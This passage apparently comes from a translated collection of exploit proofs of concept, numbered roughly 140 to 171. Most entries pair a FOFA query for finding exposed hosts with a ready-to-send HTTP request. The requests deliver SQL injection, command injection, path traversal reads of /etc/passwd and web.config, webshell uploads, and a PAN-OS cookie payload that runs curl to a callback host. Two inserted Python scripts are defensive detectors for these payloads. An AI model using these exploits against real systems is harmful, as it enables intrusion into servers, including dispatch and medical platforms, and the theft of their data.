GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= is "id"); the user and passwd values are a fixed built-in credential.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
The SESSID cookie value is used as a file name; the traversal drops a file into the device telemetry directory and the backtick substitution in its name is executed when telemetry is processed.
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
url is base64 (cnRzcDovL2EK = rtsp://a); transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; so the command output appears between the [S] and [E] markers.
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

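Added example (not part of the original article): the traversal entries above (126 aiohttp static route, 129 ColdFusion file_name, 132 TeamCity with its /res/../admin/ variants and the ;.jsp suffix, 147 RaidenMAILD) all come down to a server that checks the literal request string instead of the path it will actually resolve. The Python below resolves a target against its route mount the way a filesystem would and flags the escape, the matrix-parameter suffix trick and double encoding. The sample targets are reconstructed from the PoCs; the /logs directory used for the ColdFusion-style value is an assumption standing in for the real log folder.

```python
from urllib.parse import unquote

EXEC_SUFFIXES = (".jsp", ".jspx", ".php", ".aspx", ".ashx")


def decode_path(path_like):
    """Percent-decode twice so %2e%2e and %252e%252e both surface as '..'."""
    return unquote(unquote(path_like))


def strip_matrix_params(path_like):
    """Drop ';param' suffixes from every segment. The servlet container routes on
    the stripped form while a string-based access check may look at the literal
    one (the '/app/rest/users;.jsp' trick in entry 132)."""
    return "/".join(seg.split(";", 1)[0] for seg in path_like.split("/"))


def suffix_spoof(path_like):
    """True when the literal last segment ends in an allow-listed suffix that
    disappears once matrix parameters are stripped."""
    decoded = decode_path(path_like)
    literal_tail = decoded.rsplit("/", 1)[-1].lower()
    routed_tail = strip_matrix_params(decoded).rsplit("/", 1)[-1].lower()
    return literal_tail.endswith(EXEC_SUFFIXES) and not routed_tail.endswith(EXEC_SUFFIXES)


def resolve_under(base, path_like):
    """Resolve path_like against base (a route mount such as '/static', or the
    directory a file parameter is joined onto) the way a filesystem would.
    Returns (resolved_path, escapes); escapes becomes True as soon as a '..'
    climbs above base, which is the check the vulnerable handlers did not make."""
    decoded = strip_matrix_params(decode_path(path_like))
    base = "/" + base.strip("/")
    rel = decoded[len(base):] if decoded == base or decoded.startswith(base + "/") else decoded
    stack = [s for s in base.split("/") if s]
    base_depth, escapes = len(stack), False
    for seg in rel.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            if len(stack) < base_depth:
                escapes = True
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escapes


def triage_target(raw_target, mount):
    """All checks for one request target served from `mount` (query string excluded)."""
    path = raw_target.split("?", 1)[0]
    decoded = decode_path(path)
    resolved, escapes = resolve_under(mount, path)
    return {
        "dot_segment": ".." in decoded.split("/"),
        "double_encoded": unquote(path) != decoded,
        "matrix_param": strip_matrix_params(decoded) != decoded,
        "suffix_spoof": suffix_spoof(path),
        "resolved": resolved,
        "escapes_mount": escapes,
    }


# Constructed targets mirroring entries 126, 132 (CVE-2024-27199) and 147, plus a benign one.
SAMPLES = [
    ("/static/../../../../../etc/passwd", "/static"),
    ("/res/../admin/diagnostic.jsp", "/res"),
    ("/.well-known/acme-challenge/../../admin/diagnostic.jsp", "/.well-known/acme-challenge"),
    ("/webeditor/../../../windows/win.ini", "/webeditor"),
    ("/static/js/../css/app.css", "/static"),
]

if __name__ == "__main__":
    for target, mount in SAMPLES:
        print(target, "->", triage_target(target, mount))
    # Parameter values later used as paths get the same treatment: the TeamCity
    # jsp= value (entry 132) and a ColdFusion-style file_name= value (entry 129);
    # '/logs' is an assumed stand-in for the real log directory.
    print(suffix_spoof("/app/rest/users;.jsp"), resolve_under("/logs", "../../../../../../../etc/passwd"))
```

The useful property for a defender is that resolve_under reports the escape relative to the mount, not relative to the filesystem root, so a traversal that stays inside the server's document root but leaves /static is still flagged.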
148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
The validationRules field is evaluated as JavaScript by the server-side script engine, which exposes Java classes; the ;swagger-ui/ suffix on the path bypasses the authentication filter.

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
Same endpoint and mechanism as entry 149, with a Linux command:
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
The ;swagger-ui/ prefix again bypasses authentication; the request below reaches the data-source listing without a session.
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, sent as the Basic-auth credential; the username portion is passed unsanitised to a shell.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config and take a component id from the components list
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into its temporary file cache (component_id is the id obtained in step 1)
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy through the file endpoint (the response to step 2 contains the cache path)
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwei'er (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
Time-based blind injection (PostgreSQL) through the gsdwid field:
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 163
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

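Added example (not from the original article): entries 122, 134, 135, 137 to 141, 144, 145, 146, 152 and 154 all carry their payload in a query or body parameter, a cookie or the Basic-auth header, sometimes base64-wrapped so that a plain keyword match misses it. The Python below pulls every attacker-controlled string out of a raw request, base64-decodes the ones that decode to printable text, and reports which SQL, shell or code-execution pattern family matched either form. The sample requests are constructed to mirror the PoCs; "target" and "callback.example" are placeholders, and the pattern lists are mine, not the article's.

```python
import base64
import json
import re
from urllib.parse import parse_qsl, urlsplit

# Pattern families that cover the injection payloads in the PoCs above.
PATTERNS = {
    "sqli": re.compile(
        r"\b(?:sleep|pg_sleep|updatexml|extractvalue|benchmark)\s*\("
        r"|\bunion\b.{0,40}\bselect\b|\bselect\b.{0,40}\b(?:from|database|version)\b", re.I),
    "shell": re.compile(r"`|\$\(|\$\{IFS\}|\|\||;\s*(?:id|ls|cat|curl|wget|echo)\b", re.I),
    "code_exec": re.compile(r"ProcessBuilder|Runtime\.getRuntime|freemarker\.template\.utility\.Execute"),
}
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{2,}={0,2}$")


def try_base64(value):
    """Decoded text if value is well-formed base64 (>= 4 chars) that decodes to
    printable UTF-8, else None; tokens like 'true' or 'home' fail the UTF-8 check."""
    if len(value) < 4 or not B64_SHAPE.match(value):
        return None
    try:
        text = base64.b64decode(value + "=" * (-len(value) % 4), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.strip().isprintable() else None


def _parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    target = lines[0].split(" ")[1]
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return target, headers, body


def _walk_json(obj, prefix, out):
    if isinstance(obj, dict):
        for k, v in obj.items():
            _walk_json(v, f"{prefix}.{k}", out)
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            _walk_json(v, f"{prefix}[{i}]", out)
    elif isinstance(obj, str):
        out.append((prefix, obj))


def extract_values(raw):
    """(location, value) for every attacker-controlled string: query and body
    parameters (form or JSON), cookie values and the Basic-auth credential."""
    target, headers, body = _parse_request(raw)
    out = [("query:" + k, v) for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    ctype = headers.get("content-type", "")
    if "x-www-form-urlencoded" in ctype:
        out += [("form:" + k, v) for k, v in parse_qsl(body, keep_blank_values=True)]
    elif "json" in ctype and body.strip():
        _walk_json(json.loads(body), "json", out)
    for cookie in headers.get("cookie", "").split(";"):
        k, _, v = cookie.strip().partition("=")
        if k:
            out.append(("cookie:" + k, v))
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        out.append(("header:Authorization", auth.split(None, 1)[1]))
    return out


def triage_request(raw):
    """Locations whose raw or base64-decoded value matches a pattern family,
    plus any value that decodes from base64, with the decoded form shown."""
    report = {}
    for location, value in extract_values(raw):
        decoded = try_base64(value)
        hits = sorted(n for n, rx in PATTERNS.items() if rx.search(value) or (decoded and rx.search(decoded)))
        if hits or decoded:
            report[location] = {"value": value, "decoded": decoded, "hits": hits}
    return report


def _req(*lines):
    return "\r\n".join(lines)


# Constructed requests mirroring entries 122, 134, 145, 152 and 154; hosts and callback domains are placeholders.
SAMPLES = {
    "importexport": _req("GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1",
                         "Host: target", "", ""),
    "ns_asg": _req("POST /protocol/index.php HTTP/1.1", "Host: target",
                   "Content-Type: application/x-www-form-urlencoded", "",
                   'jsoncontent={"protocolType":"addmacbind","messagecontent":["{\\"IPAddr\\":\\"eth0\'and(updatexml(1,concat(0x7e,(select+version())),1))=\'\\"}"]}'),
    "pan_os": _req("GET /global-protect/login.esp HTTP/1.1", "Host: target",
                   "Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/x`curl${IFS}callback.example`;", "", ""),
    "loadmaster": _req("GET /access/set?param=enableapi&value=1 HTTP/1.1", "Host: target",
                       "Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=", "", ""),
    "tianweier": _req("POST /twms-service-mfs/mfsNotice/page HTTP/1.1", "Host: target",
                      "Content-Type: application/json", "",
                      '{"currentPage":1,"query":{"gsdwid":"x\') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND (\'a\'=\'a"}}'),
    "benign": _req("GET /index.php?page=home&lang=en HTTP/1.1", "Host: target", "", ""),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, triage_request(raw))
```

The base64 step is what makes the LoadMaster and importexport cases visible at all: neither the Authorization header nor the sql parameter contains a SQL or shell keyword until it is decoded, and a keyword rule applied to the raw request logs would pass both.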
155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is then reachable under a server-assigned name, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS (medical imaging archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>


http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
